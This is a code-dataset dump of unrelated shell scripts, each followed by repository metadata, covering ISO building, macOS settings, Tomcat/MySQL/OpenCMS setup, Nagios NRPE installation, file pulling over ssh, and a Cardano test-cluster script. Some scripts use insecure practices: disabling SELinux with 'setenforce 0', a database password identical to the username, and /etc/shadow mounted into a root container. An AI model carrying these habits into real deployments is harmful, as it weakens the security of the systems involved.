rm -f ${BUILD}/firmware/*
#Rsync over our local pool dir
pooldir="./pool"
echo "Copying ${pooldir} into ${BUILD}..."
if rsync -av ${pooldir} ${BUILD}; then
:
else
echo "Error copying ${pooldir} to ${BUILD}"
exit 1
fi
#Symlink all firmware
for firmware in `cat firmware.txt`; do
echo "Symlinking ${firmware} into /firmware/ folder"
ln -s ../${firmware} ${BUILD}/firmware/`basename ${firmware}`
done
#Copy over the rest of our modified files
yeoldfiles="poweruser.preseed boot isolinux post_install.sh"
for file in ${yeoldfiles}; do
echo "Copying ${file} into ${BUILD}"
cp -pfr ${file} ${BUILD}
done
#Generate default.preseed
echo "Generating default.preseed"
cp -pfr ${BUILD}/poweruser.preseed ${BUILD}/default.preseed
cat default.stub >> ${BUILD}/default.preseed
#Generate our new repos
echo "Generating Packages.."
mkdir -p ${CACHEDIR}
apt-ftparchive generate ${APTCONF}
apt-ftparchive generate ${APTUDEBCONF}
apt-ftparchive -c ${APTCONF} release ${BUILD}/dists/${DISTNAME} > ${BUILD}/dists/${DISTNAME}/Release
#Replace testing with alchemist
echo "Replacing ${BUILD}/dists/testing"
if [ -d ${BUILD}/dists/testing ]; then
rm -fr "${BUILD}/dists/testing"
cp -a ${BUILD}/dists/alchemist ${BUILD}/dists/testing
fi
#gpg --default-key "0E1FAD0C" --output $BUILD/dists/$DISTNAME/Release.gpg -ba $BUILD/dists/$DISTNAME/Release
cd ${BUILD}
find . -type f -print0 | xargs -0 md5sum > md5sum.txt
cd -
#Remove old iso
if [ -f ${ISOPATH}/${ISONAME} ]; then
rm -f "${ISOPATH}/${ISONAME}"
fi
echo "Building ${ISOPATH}/${ISONAME} ..."
xorriso -as mkisofs -r -checksum_algorithm_iso md5,sha1,sha256,sha512 \
-V 'YeOldeSteamOSe 2013-12-19 Beta2' -o ${ISOPATH}/${ISONAME} \
-J -isohybrid-mbr /usr/lib/syslinux/isohdpfx.bin \
-joliet-long -b isolinux/isolinux.bin \
-c isolinux/boot.cat -no-emul-boot -boot-load-size 4 \
-boot-info-table -eltorito-alt-boot -e boot/grub/efi.img \
-no-emul-boot -isohybrid-gpt-basdat -isohybrid-apm-hfsplus ${BUILD}
| true |
3ba3da81d9843cc295bddc6b9f88ccd5a540df66 | Shell | taylon/dotfiles | /setup_scripts/macos/system_settings | UTF-8 | 2,773 | 2.9375 | 3 | [] | no_license | #!/usr/bin/env bash
# Setup MacOS's NightShift
# Remove system shortcuts that will be used for something else:
# - Mission Control > Move Left/Right a space - ^left/right
# - Mission Control > Mission Control - ^up
# - Mission Control > Application Windows - ^down
# - Spotlight > Show Spotlight Search - cmd-space
# - Spotlight > Show Finder search window - option-cmd-space
defaults write org.vim.MacVim AppleFontSmoothing -int 0
# Avoid creating .DS_Store files on network volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Save screenshots to the Downloads folder
mkdir "$HOME"/downloads/Screenshots
defaults write com.apple.screencapture location -string "$HOME/downloads/screenshots"
# Ask for password immediately after lock
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Don’t automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
# Keyboard: Disable press-and-hold for keys in favor of key repeat
defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false
# Set fast keyboard repeat rate
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
# Menu bar: Set preferred date format
defaults write com.apple.menuextra.clock DateFormat -string "EEE d MMM HH:mm"
# Menu bar: Enable desired icons
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.volume" -int 1
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.clock" -int 1
defaults write com.apple.systemuiserver "NSStatusItem Visible com.apple.menuextra.battery" -int 1
defaults write com.apple.systemuiserver menuExtras -array \
"/System/Library/CoreServices/Menu Extras/Battery.menu" \
"/System/Library/CoreServices/Menu Extras/Clock.menu" \
"/System/Library/CoreServices/Menu Extras/Volume.menu"
# Finder: Show hidden files by default
defaults write com.apple.Finder AppleShowAllFiles -bool true
# Finder: show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# Finder: Set programming as the default location for new Finder windows
defaults write com.apple.finder NewWindowTarget -string "PfLo"
defaults write com.apple.finder NewWindowTargetPath -string "file://$HOME/programming/"
# Dock: Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
# Dock: Set Auto Show/Hide Delay
defaults write com.apple.Dock autohide-delay -float 0
| true |
7116c0634a777972cd275475ab7e6d14610bf9fa | Shell | shiva554/mysql_opentsdb_pusher | /src/deb/files/usr/bin/cox-pnh-brix_tsdb-puller-script.sh | UTF-8 | 851 | 3.421875 | 3 | [] | no_license | #!/bin/sh
############################################################
#Description : Script to copy data from Oracle to PNH
#Date : 01242018
#Author : Shiva Lokasani
#Frequency : Every 5 minutes
#Modification : Initial
#############################################################
LOGFILE=/var/log/cox-pnh-brix_tsdb-service.log
DATADIR=/var/cox/pnh/incoming
BRIXDIR=/var/cox/pnh
USERNAME=brix
SERVER=184.176.220.70
DATE=`date`
(echo "${DATE} Running bxextract on "${SERVER} >> $LOGFILE && \
ssh -t ${USERNAME}@${SERVER} '/usr/bin/cox-pnh-data-collection-script.sh' && \
echo "${DATE} Fetching files" >> $LOGFILE && \
scp ${USERNAME}@${SERVER}:${BRIXDIR}/* ${DATADIR}/. && \
echo "${DATE} Removing files from Brix server" >> $LOGFILE && \
ssh ${USERNAME}@${SERVER} 'rm '${BRIXDIR}'/*' ) || ( echo "Process failed" >> $LOGFILE && exit 1)
| true |
02d981e7bde052bf469a26092fd5937bcff92e42 | Shell | ro6i/homeconf | /.config/bash/keyring-unlock.sh | UTF-8 | 147 | 3.140625 | 3 | [] | no_license |
function keyring-unlock() {
read -rsp "Password: " _pass
export $(echo -n "$_pass" | gnome-keyring-daemon --replace --unlock)
unset _pass
}
| true |
7d50363f1bc587bf90d78d19d5e69b61a132aed6 | Shell | Ianfernandez09/ProyectoVagrant | /instala_todo.sh | UTF-8 | 4,438 | 3.046875 | 3 | [] | no_license | #Instala jdk
sudo yum -y install java-11-openjdk-devel
#Instala wget
sudo yum -y install wget
#Instala httpd
sudo yum -y install httpd
#Instala unzip
sudo yum -y install unzip
#Instala mysql
sudo dnf install mysql-server -y
#Descarga tomcat
sudo wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.40/bin/apache-tomcat-9.0.40.tar.gz
#Crea usuario y grupo tomcat
sudo groupadd --system tomcat
sudo useradd -d /usr/share/tomcat -r -s /bin/false -g tomcat tomcat
#Extrae el archivo descargado
sudo tar xvf apache-tomcat-9.0.40.tar.gz -C /usr/share/
#Crea un enlace simbólico para la ruta donde extraigo tomcat
sudo ln -s /usr/share/apache-tomcat-9.0.40/ /usr/share/tomcat
#Doy permisos al usuario tomcat
sudo chown -R tomcat:tomcat /usr/share/tomcat
sudo chown -R tomcat:tomcat /usr/share/apache-tomcat-9.0.40/
#Creo un servicio para tomcat
sudo touch /etc/systemd/system/tomcat.service
sudo echo "[Unit]" > /etc/systemd/system/tomcat.service
sudo echo "Description=Tomcat Server" >> /etc/systemd/system/tomcat.service
sudo echo "After=syslog.target network.target" >> /etc/systemd/system/tomcat.service
sudo echo " " >> /etc/systemd/system/tomcat.service
sudo echo "[Service]" >> /etc/systemd/system/tomcat.service
sudo echo "Type=forking" >> /etc/systemd/system/tomcat.service
sudo echo "User=tomcat" >> /etc/systemd/system/tomcat.service
sudo echo "Group=tomcat" >> /etc/systemd/system/tomcat.service
sudo echo " " >> /etc/systemd/system/tomcat.service
sudo echo "Environment=JAVA_HOME=/usr/lib/jvm/jre" >> /etc/systemd/system/tomcat.service
sudo echo "Environment='JAVA_OPTS=-Djava.awt.headless=true'" >> /etc/systemd/system/tomcat.service
sudo echo "Environment=CATALINA_HOME=/usr/share/tomcat" >> /etc/systemd/system/tomcat.service
sudo echo "Environment=CATALINA_BASE=/usr/share/tomcat" >> /etc/systemd/system/tomcat.service
sudo echo "Environment=CATALINA_PID=/usr/share/tomcat/temp/tomcat.pid" >> /etc/systemd/system/tomcat.service
sudo echo "Environment='CATALINA_OPTS=-Xms512M -Xmx1024M'" >> /etc/systemd/system/tomcat.service
sudo echo "ExecStart=/usr/share/tomcat/bin/catalina.sh start" >> /etc/systemd/system/tomcat.service
sudo echo "ExecStop=/usr/share/tomcat/bin/catalina.sh stop" >> /etc/systemd/system/tomcat.service
sudo echo " "
sudo echo "[Install]" >> /etc/systemd/system/tomcat.service
sudo echo "WantedBy=multi-user.target" >> /etc/systemd/system/tomcat.service
#Recargo servicios para que lea el de tomcat
sudo systemctl daemon-reload
#Inicio y activo el servicio de tomcat
sudo systemctl start tomcat
sudo systemctl enable tomcat
#Configurar httpd como proxy
sudo touch /etc/httpd/conf.d/tomcat_manager.conf
sudo echo "<VirtualHost *:80>" > /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " ServerAdmin root@localhost" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " ServerName tomcat.example.com" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " DefaultType text/html" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " ProxyRequests off" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " ProxyPreserveHost On" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo " ProxyPass / http://localhost:8080/" >> /etc/httpd/conf.d/tomcat_manager.com
sudo echo " ProxyPassReverse / http://localhost:8080/" >> /etc/httpd/conf.d/tomcat_manager.conf
sudo echo "</VirtualHost>" >> /etc/httpd/conf.d/tomcat_manager.conf
#Configurar SELinux para que se pueda a acceder a tomcat a traves de apache
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_can_network_relay 1
sudo setsebool -P httpd_graceful_shutdown 1
sudo setsebool -P nis_enabled 1
#Reinicio servicio httpd
sudo systemctl restart httpd && sudo systemctl enable httpd
#Inicio servicio mysql
sudo systemctl start mysqld.service
sudo systemctl enable mysqld
#Creo la base de datos en mysql
sudo mysql -e "CREATE DATABASE opencms;"
sudo mysql -e "CREATE USER 'opencms'@'localhost' identified by 'opencms';"
sudo mysql -e "GRANT ALL PRIVILEGES ON opencms.* to 'opencms'@'localhost';"
sudo mysql -e "FLUSH PRIVILEGES;"
#Descargo opencms
sudo wget http://www.opencms.org/downloads/opencms/opencms-11.0.2.zip
#Lo descomprimo
sudo unzip opencms-11.0.2.zip
#Lo muevo a la carpeta de tomcat 9
sudo mv opencms.war /usr/share/tomcat/webapps/
sudo rm -r /usr/share/tomcat/webapps/ROOT
sudo mv /usr/share/tomcat/webapps/opencms.war /usr/share/tomcat/webapps/ROOT.war
#Reinicio Tomcat9
sudo systemctl restart tomcat
| true |
552f2c64f02bd10a7d82122428f546007cd80892 | Shell | Band1to/OpenBazaar | /installers/ubuntu/DEBIAN/postinst | UTF-8 | 876 | 2.796875 | 3 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
echo "[openbazaar] Installing OpenBazaar python dependencies..."
pushd /usr/share/openbazaar
sudo virtualenv env
sudo ./env/bin/pip install -r requirements.txt
popd
sudo chmod -R 775 /usr/share/openbazaar
sudo chown -R $SUDO_USER:$SUDO_USER /usr/share/openbazaar
ln -s /usr/share/javascript/jquery/jquery.js /usr/share/openbazaar/html/bower_components/jquery/dist/jquery.js
ln -s /usr/share/javascript/jquery/jquery.js /usr/share/openbazaar/html/bower_components/jquery/src/jquery.js
ln -s /usr/share/javascript/jquery/jquery.min.js /usr/share/openbazaar/html/bower_components/jquery/dist/jquery.min.js
ln -s /usr/share/javascript/jquery/jquery.min.js /usr/share/openbazaar/html/vendors/jquery.min.js
echo
echo
echo
echo
echo "[openbazaar] Installation finished."
echo "[openbazaar] Now type 'openbazaar start' to start OpenBazaar."
echo
echo
echo
echo
| true |
83fef98145d448d2af0d1bcd126284b18483c9e0 | Shell | rjnn/tb | /alter-replica-identity.sh | UTF-8 | 1,010 | 3.90625 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
DRY_RUN=n
DB=_
usage() {
echo "usage: $0 [--dry-run] DB_NAME"
exit
}
main() {
parse_args "$@"
for tbl in $(psql -qAt -h localhost -d "$DB" -c "SELECT tablename FROM pg_tables WHERE schemaname = 'public';") ; do
echo psql -h localhost -d "$DB" -c "ALTER TABLE \"$tbl\" REPLICA IDENTITY FULL" ;
if [[ $DRY_RUN = n ]]; then
psql -h localhost -d "$DB" -c "ALTER TABLE \"$tbl\" REPLICA IDENTITY FULL" ;
fi
done
}
parse_args() {
local arg
while [[ $# -gt 0 ]]; do
arg="$1" && shift
case "$arg" in
--dry-run)
DRY_RUN=y
;;
-h|--help)
usage
;;
*)
if [[ $DB = _ ]]; then
DB="$arg"
else
usage
fi
;;
esac
done
if [[ $DB = _ ]]; then
echo "Missing DB_NAME"
usage
fi
}
main "$@"
| true |
fe672928390740d6d60dc825c19da38668ddddb8 | Shell | nagarameshreddy/scripts | /Nagios client.sh | UTF-8 | 574 | 3.046875 | 3 | [] | no_license | #! /bin/bash
#NRPE plugin installation script
echo"NRPE plugin installation script from JAVAHOME"
echo "Run this script as root user or sudo"
echo "conform that you are running with root user or sudo permissions(yes/no)"
read javahome
if ( [ "$javahome" = "yes" ] )
then {
setenforce 0
yum install gcc glibc glibc-common gd gd-devel openssl openssl-devel net-snmp -y
yum -y install xinetd
yum install nagios-plugins-all nagios-plugins-nrpe nrpe -y
service nrpe start
chkconfig nrpe on
}
else
echo "Run this script as root user or with sudo command"
fi
| true |
c5db380dfdb7c091c7766eb46c91df96a29ec0d0 | Shell | zhanzhengxiang/smartdevicelink | /SDL_Core/config.host | UTF-8 | 280 | 2.8125 | 3 | [] | no_license | #!/bin/bash
function prepare_toolchain(){
sudo apt-get install build-essential chromium-browser libbluetooth-dev libssl-dev
sudo apt-get install cmake
}
function prepare_rootfs(){
echo Nothing to do for prepare_rootfs
}
function configure_arguments(){
CMAKE_CONFIGURE=""
}
| true |
e613ef1703e3aa0838a4de05a22f3be0f9447b09 | Shell | SurfingNerd/dmd-meta | /build-netherum-bindings-for-dmd-vision.sh | UTF-8 | 1,735 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
echo "compiling hbbft-posdao-contracts"
cd hbbft-posdao-contracts
npm ci
truffle compile
cd ..
#cp hbbft-posdao-contracts/build/contracts/*.json dmd-vision/ABI
# it became tremendously difficult to develop int dotnetcore 5,
# but the API generater Tool requires dotnetcore 2.1
# since docker runs in a complex permission setup,
# the created files are owned by root.
# the script might be able to improve by splitting up the Actions:
# docker run
# docker cp
# docker stop
# docker rm
echo "copying truffle build artifacts to dmd-vision"
#docker run -it --rm --mount type=bind,source="$(pwd)",target=/root mcr.microsoft.com/dotnet/sdk:2.1 dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /root/.dotnet/tools/Nethereum.Generator.Console generate from-truffle --directory ~/hbbft-posdao-contracts/build/contracts --outputPath /root/dmd-vision/Contracts --namespace DMDVision.Contracts
docker run -it --rm --mount type=bind,source="$(pwd)"/hbbft-posdao-contracts,target=/root/hbbft-posdao-contracts --mount type=bind,source="$(pwd)"/dmd-vision,target=/root/dmd-vision mcr.microsoft.com/dotnet/sdk:2.1 bin/bash -c "dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /root/.dotnet/tools/Nethereum.Generator.Console generate from-truffle --directory ~/hbbft-posdao-contracts/build/contracts --outputPath /root/dmd-vision/Contracts --namespace DMDVision.Contracts"
# docker run -it --rm --mount type=bind,source="$(pwd)"/hbbft-posdao-contracts,target=/root/hbbft-posdao-contracts --mount type=bind,source="$(pwd)"/dmd-vision,target=/root/dmd-vision mcr.microsoft.com/dotnet/sdk:2.1 dotnet tool install --global Nethereum.Generator.Console --version 3.6.1 && /bin/bash | true |
cad09cb73f521dc70e5206915640f41387f92235 | Shell | carlosroman/infrastructure-agent | /build/package/rpm/prerm-upstart.sh | UTF-8 | 196 | 3.109375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/sh
if [ -e "/etc/init/newrelic-infra.conf" ]; then
initctl status newrelic-infra | grep start
RETVAL=$?
if [ $RETVAL -eq 0 ]; then
initctl stop newrelic-infra || exit $?
fi
fi
| true |
fd9174f14dc8e8e0c1e15c8b08b393a42c7b10a1 | Shell | FauxFaux/debian-control | /m/mailgraph/mailgraph_1.14-17_all/postrm | UTF-8 | 1,943 | 3.625 | 4 | [] | no_license | #! /bin/sh
# postrm script for mailgraph
#
# see: dh_installdeb(1)
set -e
# This script is called twice during the removal of the package; once
# after the removal of the package's files from the system, and as
# the final step in the removal of this package, after the package's
# conffiles have been removed.
case "$1" in
remove|upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
;;
purge)
for ext in '~' '%' .bak .ucf-new .ucf-old .ucf-dist; do
rm -f /etc/default/mailgraph$ext
done
rm -f /etc/default/mailgraph
if which ucf >/dev/null; then
ucf --purge /etc/default/mailgraph
fi
if which ucfr >/dev/null; then
ucfr --purge mailgraph /etc/default/mailgraph
fi
;;
*) echo "$0: didn't understand being called with \`$1'" 1>&2
exit 0;;
esac
# dh_installdeb will replace this with shell code automatically
# generated by other debhelper scripts.
# Automatically added by dh_installinit/11.3.5
if [ "$1" = "purge" ] ; then
update-rc.d mailgraph remove >/dev/null
fi
# In case this system is running systemd, we make systemd reload the unit files
# to pick up changes.
if [ -d /run/systemd/system ] ; then
systemctl --system daemon-reload >/dev/null || true
fi
# End automatically added section
# Automatically added by dh_installsystemd/11.3.5
if [ "$1" = "remove" ]; then
if [ -x "/usr/bin/deb-systemd-helper" ]; then
deb-systemd-helper mask 'mailgraph.service' >/dev/null || true
fi
fi
if [ "$1" = "purge" ]; then
if [ -x "/usr/bin/deb-systemd-helper" ]; then
deb-systemd-helper purge 'mailgraph.service' >/dev/null || true
deb-systemd-helper unmask 'mailgraph.service' >/dev/null || true
fi
fi
# End automatically added section
# Automatically added by dh_installdebconf/11.3.5
if [ "$1" = purge ] && [ -e /usr/share/debconf/confmodule ]; then
. /usr/share/debconf/confmodule
db_purge
fi
# End automatically added section
exit 0
| true |
27ff47936158afa08dba1919b5e7ec5917a3010c | Shell | mpekalski/MLDocker | /build_tf_docker.sh | UTF-8 | 1,366 | 3.65625 | 4 | [] | no_license | #!/bin/sh
# The script will first build tf:00,
# then if the $tf_rebuild variable is set it will
# recompile tensorflow (dropping container cont_tf_00 if exists).
# Further it will continue building tf:02 (form tf:01
# that should have been a result of compiling tensorflow
# on top oftf:00).
# At the end it will start a container tf (from tf:02),
# and run nvidia-smi to check if everything worked fine.
# In the end it will launch the container with bash.
#
# The tf container is launched with mapped local passwd and shadow
# folders so user can login to JupyterHub using local user credentials
# from the host machine. For safety reasons they are set to be read-only
# as everything in container is run as root (for now). This way
# user is not able to modify the content of files, without sudo.
# if [ ! -z ${tf_rebuild+x} ] || [ ! docker images | awk {'print$1":"$2'} | grep tf:01 > /dev/null]; then
#it should check hash of tf:00 if it changed then init tf_rebuild
nvidia-docker build -f Dockerfile.tf_00 -t tf:00 . && \
nvidia-docker run -d --ipc=host -v /etc/passwd:/etc/passwd:ro -v /etc/shadow:/etc/shadow:ro -v /home/$USER:/home/$USER --name tf tf:00 && \
nvidia-docker exec -it -u root tf bash -c "nvidia-smi" && \
nvidia-docker inspect $(docker ps -a | grep tf:00 | awk {'print$1'}) | grep \"IPAddress && \
nvidia-docker exec -it -u root tf bash
| true |
a9da41b52740db8b636a9a27b4457287cde14c4d | Shell | tjmacke/covid-19-analysis | /scripts/mk_cc_dict.sh | UTF-8 | 865 | 3.484375 | 3 | [
"MIT"
] | permissive | #! /bin/bash
#
. ~/etc/funcs.sh
U_MSG="usage: $0 [ -help ] [ raw-country-code-file ]"
if [ -z "$WM_HOME" ] ; then
LOG ERROR "WM_HOME not defined"
exit 1
fi
WM_BIN=$WM_HOME/bin
FILE=
while [ $# -gt 0 ] ; do
case $1 in
-help)
echo "$U_MSG"
exit 0
;;
-*)
LOG ERROR "unknown option $1"
echo "$U_MSG" 1>&2
exit 1
;;
*)
FILE=$1
shift
break
;;
esac
done
if [ $# -ne 0 ] ; then
LOG ERROR "exra arguments $*"
echo "$U_MSG" 1>&2
exit 1
fi
$WM_BIN/csv2tsv $FILE |
awk -F'\t' 'NR == 1 {
for(i = 1; i <= NF; i++)
ftab[$i] = i
pr_hdr = 1
}
NR > 1 {
if(pr_hdr){
pr_hdr = 0
printf("%s\t%s\t%s\n", "country", "cc2", "cc3")
}
printf("%s", $(ftab["Country"]))
printf("\t%s", $(ftab["Alpha-2 code"]) != "" ? $(ftab["Alpha-2 code"]) : ".")
printf("\t%s", $(ftab["Alpha-3 code"]) != "" ? $(ftab["Alpha-3 code"]) : ".")
printf("\n")
}'
| true |
5ee4cbd959d2436ee6b72adc6ade081ae31f63d3 | Shell | xuzijian629/pace2020 | /src/build-submit-binary.sh | UTF-8 | 418 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -e
##### EDIT HERE #####
BASE_FILE=min-sep.cpp
#####################
base_dir=$(dirname $0)/..
abs_base_dir=$(cd $base_dir && pwd -P)
echo building cpp files
docker run -v $abs_base_dir:$abs_base_dir gcc:9.3 bash -c "\
g++ -Ofast -std=c++17 -mpopcnt -static -o $abs_base_dir/src/main $abs_base_dir/src/$BASE_FILE &&
cd $abs_base_dir/src &&
tar -czvf main.tgz main &&
mv main.tgz .."
| true |
9c4eb377056762e002c51f63111e450e9dedf9c6 | Shell | AngelPn/Systems-Programming | /vaccineMonitor/testFile.sh | UTF-8 | 3,428 | 4.28125 | 4 | [] | no_license | #!/bin/bash
# Check if exactly 4 arguments are provided
if [ "$#" -ne 4 ]; then
echo "You must enter exactly 4 command line arguments"
echo "./testFile.sh virusesFile countriesFile numLines duplicatesAllowed"
exit 1
fi
# Keep arguments
virusesFile=$1
countriesFile=$2
numLines=$3
duplicatesAllowed=$4
# Go to testFiles directory
cd testFiles
# Check if virusesFile and countriesFile exist
# and if the two numbers given are greater than 0
if [ ! -e ${virusesFile} -o ! -e ${countriesFile} ]; then
echo "Given files do not exist in testFiles directory"
exit 1
elif [ ${numLines} -lt "0" -o ${duplicatesAllowed} -lt "0" ]; then
echo "Provided numbers are not greater than 0"
exit 1
fi
# Create arrays with the viruses and countries
viruses+=($(cat ${virusesFile}))
countries+=($(cat ${countriesFile}))
# Create array of IDs: ID is a number from 1 to 9999
# If duplicates are not allowed or numLines < 10000, generate unique IDs
if [ ${duplicatesAllowed} -eq "0" -a ${numLines} -le "10000" ]; then
ids=($(shuf -i 1-9999 -n $numLines))
# Else generate IDs randomly with duplicates
else
if [ ${duplicatesAllowed} -eq "0" ]; then
echo "Given numLines > 10K, so duplicates will be allowed..."
fi
# Get shuffled IDs
shuf_ids=($(shuf -i 1-9999))
for ((i = 0; i < numLines; )); do
# x represents how many times the ID will be duplicated
if [ ${numLines} -gt "10000" -a ${#shuf_ids[@]} -eq "1" ]; then
x=$((numLines-i))
else
x=$((RANDOM % 20 + 1))
fi
for ((j = 0; j < x; j++)); do
ids[i]=${shuf_ids[0]}
i=$(( $i + 1 ))
done
# Remove first element in shuf_ids
shuf_ids=("${shuf_ids[@]:1}")
done
fi
# Return random string of letters of length given in argument
function rand-str() {
# -dc: delete all except given set
tr -dc a-z </dev/urandom | head -c $1
}
# Return randomly YES or NO
function yes-no() {
if [ $1 -eq "0" ]; then
echo "YES"
else
echo "NO"
fi
}
# Create inputFile
touch inputFile
function write-in-File(){
index_virus=$((RANDOM % ${#viruses[@]}))
virus=${viruses[index_virus]}
vaccinated=$(yes-no $((RANDOM % 2)))
if [ "$vaccinated" = "YES" -o $((RANDOM % 2)) -eq "0" ]; then
# Create random date
dd=$((RANDOM % 31 + 1))
mm=$((RANDOM % 12 + 1))
yyyy=$((RANDOM % 3 + 2018))
# Make sure both day and month are 2 digits
if [ $dd -lt "10" ]; then
dd="0${dd}"
fi
if [ $mm -lt "10" ]; then
mm="0${mm}"
fi
date=$dd-$mm-$yyyy
echo $1 $virus $vaccinated $date >> inputFile
else
echo $1 $virus $vaccinated >> inputFile
fi
}
# For the number of lines
for ((i = 0; i < numLines - 1; i++)); do
# Create citizen's record
id=${ids[i]}
firstname=$(rand-str $((RANDOM % 12 + 3)))
lastname=$(rand-str $((RANDOM % 12 + 3)))
index_country=$((RANDOM % ${#countries[@]}))
country=${countries[index_country]}
age=$((RANDOM % 120 + 1))
write-in-File "$id $firstname $lastname $country $age"
# For every time this citizen is duplicated, write in file
while [ $(( $i + 1 )) -le ${numLines} -a "$id" = "${ids[i+1]}" ]; do
write-in-File "$id $firstname $lastname $country $age"
i=$(( $i + 1 ))
done
done
cd ../ | true |
3749f73e5bb93da76c7638157d6b37558d5859ae | Shell | tarraschk/ECN-EI3Info-TREEL | /install/1-build-d2xx-openOCD/build-and-install.command | UTF-8 | 596 | 3.53125 | 4 | [] | no_license | #!/bin/sh
set -x
DIR=`dirname $0` &&
OPERATING_SYSTEM=`uname -s` &&
echo "OPERATING_SYSTEM: $OPERATING_SYSTEM" &&
cd $DIR &&
if [ $OPERATING_SYSTEM \= Darwin ] ; then
#--- Create directories, install FTDI headers
sudo mkdir -p /usr/local/lib /usr/local/include &&
sudo cp drivers-d2xx/ftd2xx.h /usr/local/include/ &&
sudo cp drivers-d2xx/WinTypes.h /usr/local/include/ &&
#--- Install FTDI Library
./drivers-d2xx/$OPERATING_SYSTEM/build-and-install-d2xx.command
fi &&
#--- OPENOCD
./open-ocd/build-and-install-openocd-$OPERATING_SYSTEM.command &&
#---
echo "----------- Success!"
| true |
19f12e99bd5ca4f083d235285356f38e6e431a8f | Shell | Ravendexlabs/cardano-node | /scripts/byron-to-alonzo/mkfiles.sh | UTF-8 | 22,936 | 3.84375 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
set -e
# Unofficial bash strict mode.
# See: http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -u
set -o pipefail
# This script sets up a cluster that starts out in Byron, and can transition to Mary.
#
# The script generates all the files needed for the setup, and prints commands
# to be run manually (to start the nodes, post transactions, etc.).
#
# There are three ways of triggering the transition to Shelley:
# 1. Trigger transition at protocol version 2.0.0 (as on mainnet)
# The system starts at 0.0.0, and we can only increase it by 1 in the major
# version, so this does require to
# a) post an update proposal and votes to transition to 1.0.0
# b) wait for the protocol to change (end of the epoch, or end of the last
# epoch if it's posted near the end of the epoch)
# c) change configuration.yaml to have 'LastKnownBlockVersion-Major: 2',
# and restart the nodes
# d) post an update proposal and votes to transition to 2.0.0
# This is what will happen on the mainnet, so it's vital to test this, but
# it does contain some manual steps.
# 2. Trigger transition at protocol version 2.0.0
# For testing purposes, we can also modify the system to do the transition to
# Shelley at protocol version 1.0.0, by uncommenting the line containing
# 'TestShelleyHardForkAtVersion' below. Then, we just need to execute step a)
# above in order to trigger the transition.
# This is still close to the procedure on the mainnet, and requires less
# manual steps.
# 3. Schedule transition in the configuration
# To do this, uncomment the line containing 'TestShelleyHardForkAtEpoch'
# below. It's good for a quick test, and does not rely on posting update
# proposals to the chain.
# This is quite convenient, but it does not test that we can do the
# transition by posting update proposals to the network. For even more convenience
# if you want to start a node in Shelley, Allegra or Mary from epoch 0, supply the script
# with a shelley, allegra or mary string argument. E.g mkfiles.sh mary.
ROOT=example
BFT_NODES="node-bft1 node-bft2"
BFT_NODES_N="1 2"
NUM_BFT_NODES=2
POOL_NODES="node-pool1"
ALL_NODES="${BFT_NODES} ${POOL_NODES}"
INIT_SUPPLY=10020000000
FUNDS_PER_GENESIS_ADDRESS=$((${INIT_SUPPLY} / ${NUM_BFT_NODES}))
FUNDS_PER_BYRON_ADDRESS=$((${FUNDS_PER_GENESIS_ADDRESS} - 1000000))
# We need to allow for a fee to transfer the funds out of the genesis.
# We don't care too much, 1 ada is more than enough.
NETWORK_MAGIC=42
SECURITY_PARAM=10
UNAME=$(uname -s) DATE=
case $UNAME in
Darwin ) DATE="gdate";;
Linux ) DATE="date";;
MINGW64_NT* ) UNAME="Windows_NT"
DATE="date";;
esac
sprocket() {
if [ "$UNAME" == "Windows_NT" ]; then
# Named pipes names on Windows must have the structure: "\\.\pipe\PipeName"
# See https://docs.microsoft.com/en-us/windows/win32/ipc/pipe-names
echo -n '\\.\pipe\'
echo "$1" | sed 's|/|\\|g'
else
echo "$1"
fi
}
START_TIME="$(${DATE} -d "now + 30 seconds" +%s)"
if ! mkdir "${ROOT}"; then
echo "The ${ROOT} directory already exists, please move or remove it"
exit
fi
# copy and tweak the configuration
cp configuration/defaults/byron-mainnet/configuration.yaml ${ROOT}/
sed -i ${ROOT}/configuration.yaml \
-e 's/Protocol: RealPBFT/Protocol: Cardano/' \
-e '/Protocol/ aPBftSignatureThreshold: 0.6' \
-e 's/minSeverity: Info/minSeverity: Debug/' \
-e 's|GenesisFile: genesis.json|ByronGenesisFile: byron/genesis.json|' \
-e '/ByronGenesisFile/ aShelleyGenesisFile: shelley/genesis.json' \
-e '/ByronGenesisFile/ aAlonzoGenesisFile: shelley/genesis.alonzo.json' \
-e 's/RequiresNoMagic/RequiresMagic/' \
-e 's/LastKnownBlockVersion-Major: 0/LastKnownBlockVersion-Major: 1/' \
-e 's/LastKnownBlockVersion-Minor: 2/LastKnownBlockVersion-Minor: 0/'
# Options for making it easier to trigger the transition to Shelley
# If neither of those are used, we have to
# - post an update proposal + votes to go to protocol version 1
# - after that's activated, change the configuration to have
